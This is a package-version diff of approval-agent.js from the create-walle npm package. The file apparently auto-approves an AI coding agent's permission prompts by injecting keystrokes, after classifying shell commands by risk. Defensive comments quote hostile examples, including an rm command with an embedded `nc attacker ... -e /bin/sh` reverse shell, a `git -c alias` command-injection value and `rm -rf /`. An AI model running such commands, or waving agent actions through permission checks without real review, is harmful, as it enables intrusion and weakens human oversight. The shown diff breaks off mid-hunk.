npm - create-walle - Versions diffs - 0.9.25 → 0.9.26 - Mend

create-walle 0.9.25 → 0.9.26

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (179) hide show

package/template/claude-task-manager/approval-agent.js CHANGED Viewed

@@ -218,6 +218,18 @@ function _scheduleGuardedApproval(session, context, headlessWorker, broadcastFn,
 const _lastApproval = new Map(); // sessionId -> { fingerprint, ts }
 const DEDUP_WINDOW_MS = 3000;
+// User-input priority: when the human is actively driving a session (typing/arrowing at a
+// prompt), the auto-approver must NOT inject keystrokes — its `y`/Enter/backspace would
+// interleave with the user's arrow sequences and steal/garble navigation. handleInput marks
+// the session active via markUserActive(); sendApprovalKeystroke yields within the backoff.
+const _userActiveAt = new Map(); // sessionId -> ts (ms) of last manual keystroke
+const USER_BACKOFF_MS = Math.max(0, Number(process.env.CTM_APPROVER_USER_BACKOFF_MS ?? 1500)); // env override in ms (default 1500); negatives clamp to 0. NOTE(review): a non-numeric value yields NaN
+function _userIsDriving(sessionId) { // true while sessionId has a recorded manual keystroke newer than USER_BACKOFF_MS
+  if (!sessionId || USER_BACKOFF_MS <= 0) return false; // no session id, or a backoff of 0 -> never reports the user as driving
+  const at = _userActiveAt.get(sessionId); // undefined when no keystroke has been recorded for this session
+  return !!at && (Date.now() - at) < USER_BACKOFF_MS; // a NaN backoff makes this comparison false, so the guard is then always off
+}
 // Determine which option to send — delegates to provider if available,
 // falls back to Claude Code behavior ("2" for allow-all, "1" for plain Yes).
 function getApproveKeystroke(context, options = {}) {
@@ -391,7 +403,15 @@ function parseApprovalContext(cleanText, providerId) {
     if (fileOp) { toolName = fileOp.toolName; fileOpCommand = fileOp.command; }
   }
-  const command = (fileOpCommand || contextLines.join('\n')).trim();
+  // Bash approvals render the command followed by one dimmed prose description
+  // line; drop it from the command so titles/signatures stay command-shaped
+  // (mirror of the claude-code provider parse path).
+  let cmdLines = contextLines;
+  if (/^[⏺●]?\s*Bash\b/.test(toolName)) {
+    const cc = getProvider('claude-code');
+    if (cc && typeof cc.stripBashDescriptionTail === 'function') cmdLines = cc.stripBashDescriptionTail(contextLines);
+  }
+  const command = (fileOpCommand || cmdLines.join('\n')).trim();
   // Build focused context: tool header + command + warning + prompt (not the whole screen)
   const ctxStart = Math.max(0, endIdx - (contextLines.length + 1));
@@ -484,6 +504,75 @@ function isLiveApprovalPrompt(cleanText) {
   return false;
 }
+// A Claude ExitPlanMode plan-approval ("…written up a plan and is ready to
+// proceed?" with the plan-flow options) is the USER's deliberate plan decision,
+// NOT a tool permission. CTM must stay fully hands-off: never auto-press a key
+// (pressing "1" = "Yes, and use auto mode" auto-runs the WHOLE plan) and never
+// raise the approval banner. The session still surfaces via the normal Needs-You
+// signal. The generic wait-state classifier already tags these as a `choice`,
+// but plan approvals are high-stakes, so this dedicated guard is applied on the
+// main + rescue paths as defense-in-depth.
+//
+// Tight on purpose — requires BOTH a plan-flavored proceed question AND a
+// plan-specific option/footer tell — so a genuine "Do you want to proceed?" Bash
+// approval (a real permission, with plain "1. Yes / 2. No") is NOT swallowed.
+const PLAN_APPROVAL_QUESTION_RE = /\b(?:written up a plan|ready to proceed|(?:would you like|do you want|like) to proceed)\b/i;
+const PLAN_APPROVAL_OPTION_RE = /\byes,?\s*and\s*(?:use\s*)?auto[- ]?(?:mode|accept)|manually approve edits|(?:no,?\s*(?:and\s*)?)?keep planning|refine with\b|approve with this feedback|shift\+tab to approve\b/i;
+function isPlanApprovalPrompt(cleanText) { // true when the text matches BOTH the plan question regex and a plan-specific option/footer regex
+  const text = String(cleanText || ''); // null/undefined/other falsy input becomes ''
+  if (!text.trim()) return false; // empty or whitespace-only text is never a plan approval
+  return PLAN_APPROVAL_QUESTION_RE.test(text) && PLAN_APPROVAL_OPTION_RE.test(text); // both regexes are non-global, so test() keeps no lastIndex state between calls
+}
+// Content-addressed fingerprint of a visible ExitPlanMode plan card, used to
+// drive the server's convergence render ("keep pushing a clean snapshot until a
+// frame carrying THIS card has reached the clients"). It must be:
+//   - DISTINCT per plan (so a new plan re-renders, never deduped against an old
+//     one) → we hash the whole card region, including the plan body text, not
+//     just the static option labels (which collide across plans); and
+//   - STABLE across the live spinner / token counter / elapsed-time churn (so a
+//     settled card is not re-pushed every frame) → we mask those volatile bits
+//     before hashing.
+// Expects ANSI-stripped text. Returns null when no plan card is present.
+const PLAN_FP_VOLATILE_RES = [
+  /\(\s*\d+\s*m\s*\d+\s*s\s*\)/g,            // elapsed "(5m 50s)"
+  /\b[\d.,]+\s*k?\s*tokens?\b/gi,             // "22.7k tokens"
+  /\besc to interrupt\b/gi,                   // composer footer churn
+  /[⠀-⣿◐◓◑◒·✢✳✻✽∗⋆]/g,             // braille + asterisk spinner glyphs
+  /\b\d{1,2}:\d{2}(?::\d{2})?\b/g,            // clocks
+];
+// Shared volatile-masked hash of a card region: the XOR variant of djb2 (seed 5381, h*33 ^ charCode), kept as an
+// unsigned 32-bit value and returned as a hex string (cheap, collision-safe enough for frame identity). Masks the
+// spinner / token counter / elapsed-time / clock churn so a settled card is not re-pushed every frame.
+function _maskedCardHash(cleanText) {
+  let norm = String(cleanText || ''); // null/undefined input hashes as the empty string
+  for (const re of PLAN_FP_VOLATILE_RES) norm = norm.replace(re, ' '); // blank out every volatile match before hashing
+  norm = norm.replace(/\s+/g, ' ').trim().toLowerCase(); // collapse whitespace and fold case so layout/case churn does not change the hash
+  let h = 5381;
+  for (let i = 0; i < norm.length; i++) h = (((h << 5) + h) ^ norm.charCodeAt(i)) >>> 0; // >>> 0 wraps the running value to an unsigned 32-bit integer
+  return h.toString(16); // hex digits, no prefix and no zero padding
+}
+function planCardFingerprint(cleanText) { // returns 'plan-<hex hash>' when the text is a plan-approval prompt, otherwise null
+  const text = String(cleanText || '');
+  if (!isPlanApprovalPrompt(text)) return null; // this also covers empty / whitespace-only text
+  return 'plan-' + _maskedCardHash(text); // hashes the whole text passed in, after volatile-bit masking
+}
+// General selection-card identity for the convergence render: AskUserQuestion menus,
+// permission prompts, and any other interactive card. UNLIKE planCardFingerprint, this
+// does NOT decide whether a card is present — the CALLER establishes that via the proven
+// structural classifier (lib/wait-state.js evaluateWaitState → kind 'choice'/'approval',
+// which is position-based and footer-agnostic, so it fires even when an 'esc to interrupt'
+// composer footer is co-painted). This just produces the stable, volatile-masked frame
+// identity the convergence render dedups on (distinct per card, stable across spinner churn).
+// Returns null only for empty text. Expects ANSI-stripped text.
+function cardTextFingerprint(cleanText) { // returns 'card-<hex hash>' for any non-blank text, otherwise null
+  const text = String(cleanText || '');
+  if (!text.trim()) return null; // blank text is the only case that yields null; no card detection happens here
+  return 'card-' + _maskedCardHash(text); // same masked hash as the plan fingerprint, under a different prefix
+}
 // Normalize a command into a stable "signature" by extracting the command structure
 // and replacing variable parts (paths, strings, numbers) with placeholders.
 // Examples:
@@ -521,6 +610,10 @@ function normalizeCommandSignature(toolName, command) {
     .replace(/(["'`])(?:(?!\1).)*\1/g, '<arg>')
     // Replace URLs with <url>
     .replace(/https?:\/\/\S+/g, '<url>')
+    // Replace UUIDs (session SIDs etc.) with <id> BEFORE <num>, so a per-session
+    // id doesn't fragment the signature (the digit runs inside a UUID aren't
+    // \b-bounded, so <num> would leave it mostly literal and unique per run).
+    .replace(/\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b/gi, '<id>')
     // Replace absolute paths with <path>
     .replace(/(?:\/[\w._-]+){2,}/g, '<path>')
     // Replace standalone numbers (PIDs, ports, line numbers) with <num>
@@ -722,18 +815,6 @@ function escalationCommandParts(context) {
   return { title, signature };
 }
-// A rescue candidate is "actionable" only when we have a concrete command to show
-// the operator AND the parser classified the tool. An empty command or an
-// "Unknown" tool means the parse degraded (almost always approval-shaped PROSE,
-// not a live prompt) — escalating it just yields a confusing, meaningless banner.
-function _rescueCandidateActionable(context) {
-  if (!context) return false;
-  if (!escalationCommandParts(context).title) return false;
-  const tool = String(context.toolName || '').replace(/^[⏺●\s]+/, '').trim().toLowerCase();
-  if (!tool || tool === 'unknown') return false;
-  return true;
-}
 // The crisp, OBJECTIVE reason a command was sent to review instead of auto-approved
 // — a category + sentence, NOT the AI verifier's vague free-text. First match wins
 // (priority order). Shown in the session banner and the Pending group's "Why
@@ -892,6 +973,10 @@ function _splitShellClauses(cmd) {
     if (depth > 0) { buf += ch; continue; }
     if (ch === '\n' || ch === ';') { clauses.push(buf); buf = ''; continue; }
     if (ch === '&' || ch === '|') {
+      // A `&` that is part of a redirect (`2>&1`, `>&2`, `&>file`) is NOT a
+      // clause separator — splitting there manufactured a bogus `1` clause that
+      // forced common `… 2>&1 | …` commands to medium risk.
+      if (ch === '&' && (s[i - 1] === '>' || next === '>')) { buf += ch; continue; }
       // && || |& all consume two chars; single & or | consume one.
       if (next === ch || (ch === '|' && next === '&')) { i += 1; }
       clauses.push(buf); buf = ''; continue;
@@ -910,6 +995,136 @@ function _isProcessControlClause(clause) {
   return /\b(?:kill|pkill|killall)\b/.test(clause) || /\bxargs\b[\s\S]*\bkill\b/.test(clause);
 }
+// Pure shell control-flow keywords execute nothing on their own — they only
+// structure a loop/conditional. The clause splitter emits them as standalone
+// clauses (`for f in …`, `do`, `done`, `then`, `fi`, `esac`, …). Classifying them
+// as unknown COMMANDS used to force every looped command to 'medium' → the LLM
+// verifier, even when the loop body was entirely safe. They carry no risk by
+// themselves, so they are skipped like a bare assignment. The COMMANDS inside the
+// body are split into their own clauses and classified independently, so a
+// dangerous body (`do rm -rf /; done`, `do kill …; done`) still escalates — the
+// MAX-risk-per-clause invariant (and the whole-command high-risk scan above) is
+// untouched.
+function _isControlFlowClause(clause) { // true when the clause is empty or is pure control-flow structure that runs no command
+  const c = String(clause || '').trim(); // null/undefined clause is treated as ''
+  if (!c) return true; // an empty clause has nothing to classify, so it is reported as skippable
+  // Bare structural keywords / block punctuation (nothing executes).
+  if (/^(?:do|done|then|else|fi|esac|in|;;|\{|\})$/.test(c)) return true;
+  // Loop/conditional headers that introduce no command of their own:
+  //   `for VAR in LIST`, `case WORD in`. Skipped ONLY when the header contains no
+  //   command substitution ($(…) / backticks) — a substitution IS a real exec
+  //   vector and must stay classified, so such a header falls through to review.
+  if (/^for\s+\w+\s+in\b/.test(c) && !/\$\(|`/.test(c)) return true;
+  if (/^case\s+\S+\s+in\b/.test(c) && !/\$\(|`/.test(c)) return true;
+  return false;
+}
+// A real command can be glued to a leading control keyword by the splitter
+// (`do sips …`, `then make …`, `while read …`, `if test …`). Strip the keyword so
+// the body command itself is risk-classified, not the keyword. Process-control,
+// high-risk, and devSafe checks then apply to the actual command.
+function _stripLeadingControlKeyword(clause) { // returns the clause with one leading control keyword (plus the whitespace after it) removed
+  return String(clause || '').replace(/^\s*(?:do|then|else|elif|while|until|if)\s+/, ''); // anchored and non-global: at most one keyword is stripped, and only when whitespace follows it
+}
+// --- Dev-instance cleanup family -------------------------------------------
+// Stopping a local dev server and removing its /tmp scratch is a routine,
+// repeated action (lsof -ti :PORT | xargs kill ; rm -rf /tmp/<scratch>). On its
+// own each piece classifies 'medium' (kill = process control, rm = unrecognized)
+// so it parks the agent every time. These three helpers recognize ONLY that
+// narrow shape; anything broader (kill by name, kill -1, rm outside /tmp, a
+// `..` escape) does NOT match and falls through to the normal medium/high path.
+// Shell metacharacters that introduce EXECUTION or expansion: command/process
+// substitution ($(…) / `…` / <(…)), brace/arith expansion, redirects, subshells.
+// Any clause containing these is disqualified from the auto-approve allowlist —
+// otherwise `rm -rf /tmp/x$(nc attacker 9 -e /bin/sh)` would pass the /tmp-shape
+// check (the substitution is glued to a /tmp token with no whitespace) and the
+// embedded command would run. Pipes/semicolons are NOT here: the splitter
+// already breaks on them, so each clause is classified on its own. `*?[]` glob
+// chars are allowed (rm of /tmp/walle-stream*.txt is a normal cleanup).
+function _hasShellExecMetachars(s) { // true when s contains a backtick, $, parenthesis, angle bracket, brace, or backslash; null/undefined is treated as ''
+  return /[`$()<>{}\\]/.test(String(s || ''));
+}
+// `rm [-flags] <targets>` where EVERY target is strictly under /tmp/ (at least
+// one segment below /tmp, no bare /tmp, no `..` escape) and contains only safe
+// path/glob characters. Recursive is fine here — the blast radius is confined to
+// temp scratch. A substitution/expansion anywhere in the clause disqualifies it.
+function _isTmpScopedRmClause(clause) {
+  const c = String(clause || '').trim();
+  if (!/^rm\b/.test(c)) return false;
+  if (_hasShellExecMetachars(c)) return false;
+  const targets = [];
+  let flagsDone = false;
+  for (const tok of c.split(/\s+/).slice(1)) {
+    if (!flagsDone && tok === '--') { flagsDone = true; continue; }
+    if (!flagsDone && /^-/.test(tok)) continue;
+    targets.push(tok.replace(/^['"]|['"]$/g, ''));
+  }
+  if (!targets.length) return false;
+  return targets.every((t) => !/\/\.\.?(\/|$)/.test(t) && /^\/tmp\/[\w.\-/*?[\]]+$/.test(t));
+}
+// Port-scoped process termination: `lsof -ti :PORT | xargs kill [-SIG]` (fed by
+// the lsof producer in the same pipeline) or `kill [-SIG] <numeric pids>`. Never
+// matches a kill of process group/all (`-1`) or kill-by-name (pkill/killall).
+function _isPortScopedKillClause(clause) {
+  const c = String(clause || '').trim();
+  if (_hasShellExecMetachars(c)) return false;
+  if (/\bpkill\b|\bkillall\b/.test(c)) return false;
+  if (/\bkill\b[\s\S]*(?:^|\s)-1\b/.test(c)) return false; // kill … -1 (all/process-group)
+  if (/^xargs\b[\s\S]*\bkill\b/.test(c)) return true;      // PIDs arrive via stdin from lsof
+  const m = c.match(/^kill\b(.*)$/);
+  if (!m) return false;
+  const targets = m[1].trim().split(/\s+/).filter(Boolean).filter((a) => !a.startsWith('-'));
+  return targets.length > 0 && targets.every((a) => /^\d+$/.test(a));
+}
+// `lsof -ti :PORT` style PID producer (terse + by-port). Read-only; only useful
+// here as the safe left side of the port-kill pipeline.
+function _isDevPortLsofClause(clause) { // true for an lsof invocation that carries a t-flag and a :PORT argument
+  const c = String(clause || '').trim(); // null/undefined clause is treated as ''
+  if (_hasShellExecMetachars(c)) return false; // substitution / redirect / expansion anywhere disqualifies the clause
+  return /^lsof\b/.test(c) && /-[a-z]*t/.test(c) && /:\d{2,5}\b/.test(c); // starts with lsof; a dash followed by lowercase letters up to a 't' (-t, -ti, ...); ':' plus 2-5 digits
+}
+// True only when the WHOLE command is the dev-cleanup family: every clause is a
+// port-scoped kill, a /tmp-scoped rm, the lsof PID producer, a sleep, or an
+// inherently-harmless assignment/control-flow keyword. Deliberately NARROW so it
+// does not punch through the per-clause-max process-control guardrail (the
+// Cursor `&&`-allowlist-bypass CVE class): a kill clause only counts as cleanup
+// when the command ALSO contains an `lsof :PORT` producer (i.e. killing whatever
+// holds a local port) — a bare `kill -9 <pid>`, a kill mixed with any unrelated
+// command, or a kill-by-name (pkill/killall) all stay 'medium' → verifier.
+// Operates on the already-unwrapped, lowercased command.
+function _isDevCleanupCommand(cmd) { // cmd: the whole command string; returns true only for the narrow dev-cleanup shape
+  const clauses = _splitShellClauses(cmd);
+  if (!clauses.length) return false; // nothing to classify
+  let sawLsofPort = false, sawKill = false, sawTmpRm = false; // which clause kinds were seen; they drive the pairing rule at the end
+  for (const raw of clauses) {
+    const c = _stripLeadingControlKeyword(raw).trim(); // judge the command left after one leading do/then/if/... keyword is removed
+    if (!c) continue; // blank clause: nothing to judge
+    // Any exec metacharacter ($()/`…`/<()/>()/{}/subshell/redirect) disqualifies
+    // the whole command BEFORE the harmless-looking skips below — otherwise a
+    // clause like `FOO=<(nc …)` (skipped as a bare assignment) or a redirect to
+    // an arbitrary file would smuggle execution into an auto-approved teardown.
+    if (_hasShellExecMetachars(c)) return false; // NOTE(review): this already rejects '$', '(' and backticks, so the substitution tests on the bare-assignment line below cannot fail here
+    if (_isControlFlowClause(c)) continue;
+    if (/^\w+=/.test(c) && !/\$\((?!\()/.test(c) && !/`/.test(c)) continue; // bare assignment
+    if (/^sleep\s+[\d.]+\s*$/.test(c)) continue;
+    if (_isDevPortLsofClause(c)) { sawLsofPort = true; continue; }
+    if (_isPortScopedKillClause(c)) { sawKill = true; continue; }
+    if (_isTmpScopedRmClause(c)) { sawTmpRm = true; continue; }
+    return false; // any other clause disqualifies the whole command
+  }
+  // A kill only qualifies as dev-cleanup when paired with an lsof port producer;
+  // otherwise it stays medium (the process-control guardrail). A pure /tmp-scoped
+  // rm needs no lsof — its blast radius is confined to scratch.
+  if (sawKill && !sawLsofPort) return false;
+  return sawKill || sawTmpRm;
+}
 // Simple heuristic review when no API key is available
 function reviewWithHeuristics(context) {
   const cmd = (context.command || '').toLowerCase();
@@ -983,6 +1198,16 @@ function reviewWithHeuristics(context) {
     }
   }
+  // Dev-instance cleanup family (stop a local dev server + delete its /tmp
+  // scratch). Recognized as a WHOLE-command shape so the port-scoped kill and
+  // the /tmp-scoped rm — which each look 'medium' in isolation — don't park the
+  // agent on every teardown. Runs AFTER the high-risk scan (so a non-/tmp rm or
+  // sudo still wins) and the dangerous-command blocklist remains the hard floor.
+  if (_isDevCleanupCommand(cmdUnwrapped || cmd)) {
+    return { decision: 'approve', reasoning: 'Dev-instance cleanup — port-scoped kill + /tmp scratch removal (heuristic)', riskLevel: 'low',
+      ruleLabel: 'Dev cleanup', rulePattern: '', ruleDescription: 'Stop a local dev server (lsof :PORT | xargs kill) and remove its /tmp scratch files' };
+  }
   // Local dev operations that are safe to auto-approve — matched PER CLAUSE.
   const devSafe = [
     { re: /echo\s+.*>\s*\/tmp\//, label: 'Write to /tmp', desc: 'Echo output to temp files' },
@@ -991,7 +1216,17 @@ function reviewWithHeuristics(context) {
     { re: /\bcat\s/, label: 'Read file contents', desc: 'View file contents with cat' },
     { re: /\bls\b/, label: 'List directory', desc: 'List files and directories' },
     { re: /\bpwd\b/, label: 'Print working directory', desc: 'Show current directory path' },
-    { re: /git\s+(status|log|diff|branch|show|stash\s+list|tag|remote)/, label: 'Git read operations', desc: 'Read-only git commands (status, log, diff, branch, show, tag, remote)' },
+    // Read-only git, tolerant of git's leading global options so `git -C <repo>
+    // status` classifies the same as `git status` (matches Claude Code / Codex).
+    // Only KNOWN-SAFE global options are skipped: `-C`/`--git-dir`/`--work-tree`/
+    // `--namespace` (+ value) and pager/lock booleans. Exec-affecting options
+    // (`-c name=value`, `--config-env`, `--exec-path`) are deliberately excluded,
+    // so `git -c alias.x='!cmd' x` does NOT match here and stays medium-risk.
+    // caseSensitive: matched against the ORIGINAL-case clause. git's `-C`
+    // (directory, safe) and `-c` (config/alias injection) collapse to the same
+    // token under toLowerCase(), so this rule must see the real case to keep
+    // `-c alias.x='!cmd'` out of the read-only class.
+    { re: /\bgit\s+(?:(?:-C|--git-dir|--work-tree|--namespace)(?:=\S+|\s+\S+)\s+|(?:-p|-P|--paginate|--no-pager|--bare|--no-replace-objects|--literal-pathspecs|--glob-pathspecs|--noglob-pathspecs|--icase-pathspecs|--no-optional-locks|--no-advice)\s+)*(?:status|log|diff|branch|show|stash\s+list|tag|remote)\b/, caseSensitive: true, label: 'Git read operations', desc: 'Read-only git commands (status, log, diff, branch, show, tag, remote)' },
     // NOTE: `node -e`, `python -c`, `cp`, `mv`, and `sqlite3` are intentionally
     // NOT here — they can run arbitrary code or mutate/overwrite arbitrary files
     // (incl. databases) and must go through the AI reviewer/verifier (medium),
@@ -1001,7 +1236,8 @@ function reviewWithHeuristics(context) {
     { re: />\s*\/tmp\//, label: 'Write to /tmp', desc: 'Redirect output to temp files' },
     { re: /touch\s/, label: 'Create empty file', desc: 'Create or update file timestamps' },
     { re: /\bcurl\s[\s\S]*?(https?:\/\/localhost|http:\/\/127\.0\.0\.1)/, label: 'Curl localhost', desc: 'HTTP requests to local dev servers' },
-    { re: /grep\s+-?[crn]/, label: 'Grep search', desc: 'Search file contents with grep' },
+    // grep/egrep/fgrep/ripgrep are read-only regardless of flags (-i/-v/-q/-c…).
+    { re: /\b(?:(?:e|f)?grep|rg)\b/, label: 'Grep search', desc: 'Search file contents with grep/ripgrep' },
     { re: /wc\s/, label: 'Word count', desc: 'Count lines/words/bytes' },
     { re: /head\s|tail\s/, label: 'Read file head/tail', desc: 'View beginning or end of files' },
     { re: /which\s|type\s/, label: 'Find command', desc: 'Locate commands in PATH' },
@@ -1025,18 +1261,41 @@ function reviewWithHeuristics(context) {
   // unrecognized makes the whole command 'medium' → AI reviewer/verifier (which,
   // with session context, can still auto-approve a goal-aligned action).
   const clauses = _splitShellClauses(cmdUnwrapped || cmd);
+  // Original-case clauses, parallel to `clauses`, for rules flagged
+  // caseSensitive (case is security-relevant for git's -C vs -c). Splitting is
+  // case-independent, so indices line up 1:1.
+  const cmdRawUnwrapped = String(context.command || '')
+    .replace(/^(#[^\n]*\n\s*)*/, '')
+    .replace(/^(time|env|nice|nohup|command)\s+/gi, '');
+  const clausesRaw = _splitShellClauses(cmdRawUnwrapped);
   let firstSafe = null;
   let review = null;
-  for (const clause of clauses) {
+  // Tracks that at least one clause was skipped as inherently harmless (a bare
+  // assignment or pure control-flow keyword). Used so a command made ENTIRELY of
+  // such clauses (e.g. `DEV_CTM_PORT=4856; DEV_WALLE_PORT=4857`) classifies low
+  // instead of falling through to the medium default — it executes nothing.
+  let skippedSafe = false;
+  for (let ci = 0; ci < clauses.length; ci += 1) {
+    let clause = clauses[ci];
+    let clauseRaw = clausesRaw[ci] != null ? clausesRaw[ci] : clause;
+    // Control-flow structure (for/do/done/then/fi/esac/…) executes nothing on its
+    // own — skip it so a loop of safe commands is not forced to 'medium' by the
+    // loop keywords. The body commands are still classified as their own clauses.
+    if (_isControlFlowClause(clause)) { skippedSafe = true; continue; }
+    // A leading control keyword can be glued onto a real command by the splitter
+    // (`do sips …`); strip it so the body command — not the keyword — is judged.
+    clause = _stripLeadingControlKeyword(clause);
+    clauseRaw = _stripLeadingControlKeyword(clauseRaw);
+    if (!clause.trim()) continue;
     // A bare assignment with no command substitution just sets a variable
     // (literal or arithmetic) — harmless. `VAR=$(cmd)` keeps the inner command,
     // so it falls through to be classified by that command below.
-    if (/^\w+=/.test(clause) && !/\$\((?!\()/.test(clause) && !/`/.test(clause)) continue;
+    if (/^\w+=/.test(clause) && !/\$\((?!\()/.test(clause) && !/`/.test(clause)) { skippedSafe = true; continue; }
     if (_isProcessControlClause(clause)) {
       review = review || { label: 'Process control', desc: 'Terminates processes (kill/pkill) — review the target' };
       continue;
     }
-    const safe = devSafe.find(({ re }) => re.test(clause));
+    const safe = devSafe.find(({ re, caseSensitive }) => re.test(caseSensitive ? clauseRaw : clause));
     if (safe) { firstSafe = firstSafe || safe; continue; }
     review = review || { label: context.toolName || 'Bash command', desc: 'Routed to AI reviewer/verifier for a decision' };
   }
@@ -1048,6 +1307,12 @@ function reviewWithHeuristics(context) {
     return { decision: 'approve', reasoning: 'Common dev operation (heuristic, all clauses safe)', riskLevel: 'low',
       ruleLabel: firstSafe.label, rulePattern: firstSafe.re.source, ruleDescription: firstSafe.desc };
   }
+  // Every clause was an inherently-harmless assignment / control-flow keyword and
+  // nothing executed — low risk (e.g. `DEV_CTM_PORT=4856; DEV_WALLE_PORT=4857`).
+  if (skippedSafe) {
+    return { decision: 'approve', reasoning: 'Variable assignment / control-flow only (executes nothing)', riskLevel: 'low',
+      ruleLabel: 'Variable assignment', rulePattern: '', ruleDescription: 'Sets shell variables / control-flow keywords only' };
+  }
   // Default: medium risk — NOT auto-approved here. Routed to the AI reviewer +
   // verifier; if the AI gate is unavailable it escalates to the user (fail-safe).
@@ -1190,6 +1455,15 @@ const BACKSPACE = '\x7f';
 // Legacy path (no headlessWorker, e.g. unit tests): keep original
 // keystroke + ENTER_DELAY_MS Enter behavior so existing tests still pass.
 function sendApprovalKeystroke(session, context, headlessWorker, options = {}) {
+  // User-input priority: if the human is actively interacting with this session's prompt,
+  // yield — do not inject. This is checked at fire-time (covers both immediate and the
+  // setTimeout-deferred guarded path) so a prompt the user has just started navigating is
+  // left alone. Steady-state auto-approval (no recent manual input) is unaffected.
+  if (session && _userIsDriving(session.id)) {
+    const sid = session.id ? session.id.slice(0, 8) : '?';
+    console.log(`[approval-agent] Skipping injection for session ${sid} — user is actively driving (backoff ${USER_BACKOFF_MS}ms)`);
+    return;
+  }
   const provider = context.providerId ? getProvider(context.providerId) : null;
   const keystroke = options.keystroke || getApproveKeystroke(context, options);
   const sid = session.id ? session.id.slice(0, 8) : '?';
@@ -1549,6 +1823,11 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
   const rawText = String(cleanText || meta.rawText || '');
   if (!rawText) return { handled: false, reason: 'empty' };
+  // Fully hands-off on plan approvals (ExitPlanMode). Never parse-for-command,
+  // never keystroke, never banner — pressing a key here can auto-run the plan,
+  // and the "command" would just be plan prose. The session stays Needs-You.
+  if (isPlanApprovalPrompt(rawText)) return { handled: false, reason: 'plan-approval' };
   const providerContext = _parseKnownProviderContext(rawText, providerId);
   let context = providerContext?.context || parseApprovalContext(rawText, providerId);
   if (!context && providerId) context = parseApprovalContext(rawText, null);
@@ -1642,14 +1921,13 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
     row.ruleLabel = review.ruleLabel || row.ruleLabel;
     row.ruleDescription = review.ruleDescription || row.ruleDescription;
     row = _saveRescuePattern(row) || row;
-    // Only pin a "review needed" banner when there is a concrete, classified
-    // command to show the operator. A non-actionable candidate (no parsed command
-    // or an unclassified "Unknown" tool) is almost always approval-shaped PROSE,
-    // not a live prompt — escalating it produces a confusing, meaningless banner.
-    // The refinement loop (handleMiss) still runs separately and learns the shape.
-    if (review.shouldWarnUser && _rescueCandidateActionable(context)) {
-      _broadcastRescueWarning(sessionId, session, broadcastFn, context, review, row);
-    }
+    // The rescue-monitor's own "I think I missed an approval" verdict is NOT
+    // surfaced as the front-and-center approval banner — that channel is reserved
+    // for genuine approvals the user can act on (blocklist/deny/verifier
+    // escalations + hook-park + the reconcile settled-frame path). A real missed
+    // prompt is still on screen and surfaces via Needs-You/reconcile; the rescue
+    // verdict only updates the (silent) suppressed-pattern record above.
+    console.log(`[approval-rescue] not-safe (silent) session=${sessionId.slice(0, 8)} diagnosis=${diagnosis || 'unknown'} label="${(escalationCommandParts(context).title || context.toolName || '').slice(0, 80)}"`);
     return { handled: false, reason: 'not-safe', fingerprint, decidedBy: review.decidedBy, diagnosis };
   }
@@ -1765,10 +2043,12 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
     : RESCUE_RETRY_COOLDOWN_MS);
   if (row.consecutiveFailures >= RESCUE_MAX_CONSECUTIVE_FAILURES) row.status = 'blocked';
   row = _saveRescuePattern(row) || row;
-  _broadcastRescueWarning(sessionId, session, broadcastFn, context, {
-    ...review,
-    reasoning: `CTM tried to auto-approve a missed prompt, but the terminal did not advance (${outputAdvanced} bytes).`,
-  }, row);
+  // Verify-failed is recorded (suppressed pattern, above) but NOT surfaced as the
+  // approval banner — the genuine prompt is still on screen and surfaces via the
+  // normal Needs-You / reconcile path. The old "CTM tried to auto-approve a missed
+  // prompt, but the terminal did not advance" banner was meta-noise about CTM's
+  // internals, not an approvable permission.
+  console.log(`[approval-rescue] verify-failed (silent) session=${sessionId.slice(0, 8)} advanced=${outputAdvanced}B label="${(escalationCommandParts(context).title || context.toolName || '').slice(0, 80)}"`);
   return {
     handled: true,
     reason: 'verify-failed',
@@ -1799,9 +2079,13 @@ async function decideApproval(context, session, options = {}) {
   const callModel = options.callModel || null;
   const command = context.command || '';
-  // 1) Dangerous-command blocklist — runs first, never overridden by other signals.
+  // 1) Dangerous-command blocklist — runs first, never overridden by other signals
+  //    (except the user's own "never block" exceptions, which we audit-log).
   if (isBlocklistEnabled()) {
     const block = checkBlocklist(command, getBlocklistConfig());
+    if (block.exempted) {
+      console.log(`[approval-agent] blocklist exception ${block.exceptionId} suppressed "${block.suppressed?.reason}" for cmd="${command.slice(0, 200)}"`);
+    }
     if (block.blocked) {
       return {
         decision: 'ask', decidedBy: 'blocklist', riskLevel: 'high',
@@ -1823,15 +2107,23 @@ async function decideApproval(context, session, options = {}) {
     };
   }
   const userAllowed = !!(permMatch && permMatch.action === 'allow');
+  const viaException = userAllowed ? permMatch.viaException : null;
+  if (viaException) {
+    console.log(`[approval-agent] deny rule ${permMatch.rule} excepted (${viaException.type}: ${viaException.value}) for cmd="${command.slice(0, 200)}"`);
+  }
   // 3) Learned rules / per-clause heuristic risk classification.
   const matchingRule = findMatchingRule(context);
   const heuristic = matchingRule ? null : reviewWithHeuristics(context);
   const riskLevel = matchingRule ? (matchingRule.risk_level || 'low') : (heuristic ? (heuristic.riskLevel || 'low') : 'low');
   const decidedBy = userAllowed ? 'user-allow' : (matchingRule ? 'rule' : 'auto');
-  const label = userAllowed ? `Allowed: ${permMatch.rule}`
+  const label = userAllowed
+    ? (viaException ? `Excepted from ${permMatch.rule} (${viaException.value})` : `Allowed: ${permMatch.rule}`)
     : matchingRule ? matchingRule.label : ((heuristic && heuristic.ruleLabel) || context.toolName);
-  const reason = userAllowed ? `Permission Manager allow rule matched: ${permMatch.rule}`
+  const reason = userAllowed
+    ? (viaException
+        ? `Deny rule ${permMatch.rule} excepted (${viaException.type} ${viaException.value})`
+        : `Permission Manager allow rule matched: ${permMatch.rule}`)
     : matchingRule ? `Matched learned rule: ${matchingRule.label}`
     : 'Auto-approved by default (not on the denylist)';
@@ -1884,19 +2176,26 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   // never auto-approved regardless of what other signals say. Opt-in.
   if (isBlocklistEnabled()) {
     const blockCheck = checkBlocklist(context.command || '', getBlocklistConfig());
+    if (blockCheck.exempted) {
